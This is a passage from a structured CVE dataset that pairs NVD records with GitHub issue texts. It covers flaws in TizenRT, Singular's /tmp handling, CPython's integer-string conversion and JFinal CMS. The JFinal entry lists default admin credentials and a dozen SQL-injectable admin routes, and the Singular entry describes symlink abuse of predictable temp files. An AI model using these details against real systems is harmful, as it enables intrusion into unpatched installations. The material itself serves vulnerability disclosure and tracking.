"matchCriteriaId": "59AD1A65-ECC5-4DC0-A7BB-C616E24A42A2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/Samsung/TizenRT/issues/5626 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Samsung",
"TizenRT"
] | # Affected components
affected source code file: external/curl/vtls/cyassl.c
# Attack vector(s)
Missing X509_free() after SSL_get_peer_certificate().
The X509 object must be explicitly freed using X509_free().
# Suggested description of the vulnerability for use in the CVE
Privacy leakage vulnerability in cyassl_connect_step2() function in Samsung Electronics TizenRT latest version (and earlier) due to missing X509_free() after SSL_get_peer_certificate().
# Discoverer(s)/Credits
UVScan
# Reference(s)
https://www.openssl.org/docs/man1.1.1/man3/SSL_get_peer_certificate.html
https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/curl/vtls/cyassl.c#L545 | Security: Privacy leakage in function cyassl_connect_step2() | https://api.github.com/repos/Samsung/TizenRT/issues/5626/comments | 0 | 2022-09-02T04:44:13Z | 2022-09-02T05:15:36Z | https://github.com/Samsung/TizenRT/issues/5626 | 1,359,697,306 | 5,626 | 4,115 |
CVE-2022-40299 | 2022-09-09T01:15:07.853 | In Singular before 4.3.1, a predictable /tmp pathname is used (e.g., by sdb.cc), which allows local users to gain the privileges of other users via a procedure in a file under /tmp. NOTE: this CVE Record is about sdb.cc and similar files in the Singular interface that have predictable /tmp pathnames; this CVE Record is not about the lack of a safe temporary-file creation capability in the Singular language. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://michael.orlitzky.com/cves/cve-2022-40299.xhtml"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Singular/Singular/commit/5f28fbf066626fa9c4a8f0e6408c0bb362fb386c"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Singular/Singular/issues/1137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://michael.orlitzky.com/cves/cve-2022-40299.xhtml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Singular/Singular/commit/5f28fbf066626fa9c4a8f0e6408c0bb362fb386c"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Singular/Singular/issues/1137"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:singular:singular:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3FE9F514-BE4C-43B5-AAF5-30D4AE629E20",
"versionEndExcluding": "4.3.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"330"
] | 330 | https://github.com/Singular/Singular/issues/1137 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Singular",
"Singular"
] | I just noticed commit https://github.com/Singular/Singular/commit/ed2fd9bb8a4241c386b59a55bd8bbfb1d66ac174 which led me to `git grep /tmp` in the codebase. There are several places where a fixed (or at least predictable) path under `/tmp` is used for temporary storage. This creates a [general class of vulnerability](https://owasp.org/www-community/vulnerabilities/Insecure_Temporary_File) that can usually be exploited by other users on the same machine.
For example, since `/tmp` is world-writable, anyone on the machine can create `/tmp/sing_log.1` through `/tmp/sing_log.65535`, making themselves the owner of those files. Later, singular will open and write to them as some other user, namely whoever is running singular. In an extreme case, if singular is running as root, and if the bad guy has created `/tmp/sing_log.N` as links pointing to important system files, then logging can erase (overwrite) those files.
I haven't tried to exploit them all, but in a few other cases, temporary files are used to store data or commands that are fed to other programs, which makes some level of code execution likely.
The `mkstemp()` function is a safe replacement within C, but would have to be exposed to the user somehow to avoid the same problem in singular code. | Insecure /tmp usage due to predictable paths | https://api.github.com/repos/Singular/Singular/issues/1137/comments | 5 | 2022-05-18T14:08:48Z | 2024-08-20T12:16:19Z | https://github.com/Singular/Singular/issues/1137 | 1,240,027,736 | 1,137 | 4,116 |
CVE-2020-10735 | 2022-09-09T14:15:08.660 | A flaw was found in python. In algorithms with quadratic time complexity using non-binary bases, when using int("text"), a system could take 50ms to parse an int string with 100,000 digits and 5s for 1,000,000 digits (float, decimal, int.from_bytes(), and int() for binary bases 2, 4, 8, 16, and 32 are not affected). The highest threat from this vulnerability is to system availability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/09/21/1"
},
{
"source": "secalert@redhat.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/09/21/4"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2020-10735"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1834423"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://docs.google.com/document/d/1KjuF_aXlzPUxTK4BMgezGJ2Pn7uevfX7g0_mvgHlL7Y"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/python/cpython/issues/95778"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00039.html"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2VCU6EVQDIXNCEDJUCTFIER2WVNNDTYZ/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/32AAQKABEKFCB5DDV5OONRZK6BS23HPW/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4EWKR2SPX3JORLWCXFY3KN2U5B5CIUQQ/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6XL6E5A3I36TRR73VNBOXNIQP4AMZDFZ/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76YE7AM37MRU76XJV4M27CWDAMUGNRYK/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSRPVJZL6DJFWKYRHMNJB7VCEUCBKRF5/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IFGV7P2PYFBMK32OKHCAC2ZPJQV5AUDF/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHC6IUU7CLRQ3QLPWUXLONSG3SXFTR47/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKYE2DOI2X7WZXAWTQJZAXYIWM37HDCY/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5U223OE5ZOUHZAZYSYSWVJQIKDE73E/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5WQB7Z3CXOWVBD2AFAHYPA5ONYFFZ4/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PD7FTLJOIGMUSCDR3JAN6WRFHJEE4PH5/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SZYJSGLSCQOKXXFVJVJQAXLEOJBIWGEL/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TD7JDDKJXK6D26XAN3YRFNM2LAJHT5UO/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMWPRAAJS7I6U3U45V7GZVXWNSECI22M/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U4ZZV4CDFRMTPDBI7C5L43RFL3XLIGUY/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UBPDVCDIUCEBE7C4NAGNA2KQJYOTPBAZ/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V7ZUJDHK7KNG6SLIFXW7MNZ6O2PUJYK6/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WXF6MQ74HVIDDSR5AE2UDR24I6D4FEPC/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZEOAJWGGY55QU35UM2OVZATBW5MX2OZD/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/09/21/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/09/21/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2020-10735"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1834423"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://docs.google.com/document/d/1KjuF_aXlzPUxTK4BMgezGJ2Pn7uevfX7g0_mvgHlL7Y"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/python/cpython/issues/95778"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00039.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2VCU6EVQDIXNCEDJUCTFIER2WVNNDTYZ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/32AAQKABEKFCB5DDV5OONRZK6BS23HPW/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4EWKR2SPX3JORLWCXFY3KN2U5B5CIUQQ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6XL6E5A3I36TRR73VNBOXNIQP4AMZDFZ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76YE7AM37MRU76XJV4M27CWDAMUGNRYK/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSRPVJZL6DJFWKYRHMNJB7VCEUCBKRF5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IFGV7P2PYFBMK32OKHCAC2ZPJQV5AUDF/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHC6IUU7CLRQ3QLPWUXLONSG3SXFTR47/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKYE2DOI2X7WZXAWTQJZAXYIWM37HDCY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5U223OE5ZOUHZAZYSYSWVJQIKDE73E/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5WQB7Z3CXOWVBD2AFAHYPA5ONYFFZ4/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PD7FTLJOIGMUSCDR3JAN6WRFHJEE4PH5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SZYJSGLSCQOKXXFVJVJQAXLEOJBIWGEL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TD7JDDKJXK6D26XAN3YRFNM2LAJHT5UO/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMWPRAAJS7I6U3U45V7GZVXWNSECI22M/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U4ZZV4CDFRMTPDBI7C5L43RFL3XLIGUY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UBPDVCDIUCEBE7C4NAGNA2KQJYOTPBAZ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V7ZUJDHK7KNG6SLIFXW7MNZ6O2PUJYK6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WXF6MQ74HVIDDSR5AE2UDR24I6D4FEPC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZEOAJWGGY55QU35UM2OVZATBW5MX2OZD/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0743C1B3-D44D-4940-AAF4-25DEFB46AC74",
"versionEndExcluding": "3.7.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E28EB81-9BE6-4EC9-AC44-EFA4DDB0233F",
"versionEndExcluding": "3.8.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24517651-FDBB-4867-99A6-25E12EE8A117",
"versionEndExcluding": "3.9.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.9.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6D795AAC-B427-4067-99F3-D36B0F936ACB",
"versionEndExcluding": "3.10.7",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.10.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha1:*:*:*:*:*:*",
"matchCriteriaId": "514A577E-5E60-40BA-ABD0-A8C5EB28BD90",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha2:*:*:*:*:*:*",
"matchCriteriaId": "83B71795-9C81-4E5F-967C-C11808F24B05",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha3:*:*:*:*:*:*",
"matchCriteriaId": "3F6F71F3-299E-4A4B-ADD1-EAD5A1D433E2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha4:*:*:*:*:*:*",
"matchCriteriaId": "D9BBF4E9-EA54-41B5-948E-8E3D2660B7EF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha5:*:*:*:*:*:*",
"matchCriteriaId": "AEBFDCE7-81D4-4741-BB88-12C704515F5C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha6:*:*:*:*:*:*",
"matchCriteriaId": "156EB4C2-EFB7-4CEB-804D-93DB62992A63",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:alpha7:*:*:*:*:*:*",
"matchCriteriaId": "8CC972AE-16A8-4B74-A3E7-36BCDD7C1ED3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "554015CB-0325-438B-8C11-0F85F54ABC50",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "8037C129-0030-455E-A359-98E14D1498D4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "7C3DC43B-72CC-4FC5-8072-F051FB47F6D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:beta4:*:*:*:*:*:*",
"matchCriteriaId": "6657ED60-908B-48E6-B95B-572E57CFBB69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:beta5:*:*:*:*:*:*",
"matchCriteriaId": "1EF628A1-82F5-403C-B527-388C13507CDF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:3.11.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "3055A198-13F8-42C0-8FD7-316AA8984A8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1987BDA-0113-4603-B9BE-76647EB043F2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*",
"matchCriteriaId": "749804DA-4B27-492A-9ABA-6BB562A6B3AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"704"
] | 704 | https://github.com/python/cpython/issues/95778 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"python",
"cpython"
] | ## Problem
A Denial Of Service (DoS) issue was identified in CPython because we use binary bignum’s for our `int` implementation. A huge integer will always consume a near-quadratic amount of CPU time in conversion to or from a base 10 (decimal) string with a large number of digits. No efficient algorithm exists to do otherwise.
It is quite common for Python code implementing network protocols and data serialization to do `int(untrusted_string_or_bytes_value)` on input to get a numeric value, without having limited the input length or to do `log("processing thing id %s", unknowingly_huge_integer)` or any similar concept to convert an `int` to a string without first checking its magnitude. (`http`, `json`, `xmlrpc`, `logging`, loading large values into integer via linear-time conversions such as hexadecimal stored in `yaml`, or anything computing larger values based on user controlled inputs… which then wind up attempting to output as decimal later on). All of these can suffer a CPU consuming DoS in the face of untrusted data.
Everyone auditing all existing code for this, adding length guards, and maintaining that practice everywhere is not feasible nor is it what we deem the vast majority of our users want to do.
This issue has been reported to the Python Security Response Team multiple times by a few different people since early 2020, most recently a few weeks ago while I was in the middle of polishing up the PR so it’d be ready before 3.11.0rc2.
## Mitigation
After discussion on the Python Security Response Team mailing list the conclusion was that we needed to limit the size of integer to string conversions for non-linear time conversions (anything not a power-of-2 base) by default. And offer the ability to configure or disable this limit.
The Python Steering Council is aware of this change and accepts it as necessary.
<!-- gh-linked-prs -->
### Linked PRs
* gh-100627
* gh-100628
* gh-101065
* gh-101066
* gh-101630
* gh-101631
<!-- /gh-linked-prs -->
| CVE-2020-10735: Prevent DoS by large int<->str conversions | https://api.github.com/repos/python/cpython/issues/95778/comments | 24 | 2022-08-08T07:53:39Z | 2023-02-07T04:35:46Z | https://github.com/python/cpython/issues/95778 | 1,331,477,062 | 95,778 | 4,117 |
CVE-2022-38272 | 2022-09-09T14:15:08.777 | JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/article/list. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/51"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/51"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/jflyfox/jfinal_cms/issues/51 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | Administrator login is required. The default account password is admin:admin123
## admin/article/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successful injection at route `admin/article/list`

## admin/article/list_approve
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/article/list_approve`

## admin/comment
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/comment/list`

## admin/contact/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/contact/list`

## admin/foldernotice/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/foldernotice/list`

## admin/folderrollpicture/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/folderrollpicture/list`

## admin/friendlylink/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/friendlylink/list`

## admin/imagealbum/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/imagealbum/list`

## admin/image/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/image/list`

## admin/site/list
There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route `admin/site/list`

| Some SQL injection vulnerabilities exists in JFinal CMS 5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/51/comments | 0 | 2022-08-09T09:43:40Z | 2022-08-09T09:46:05Z | https://github.com/jflyfox/jfinal_cms/issues/51 | 1,332,993,619 | 51 | 4,118 |
CVE-2022-38282 | 2022-09-09T14:15:09.267 | JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/videoalbum/list. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
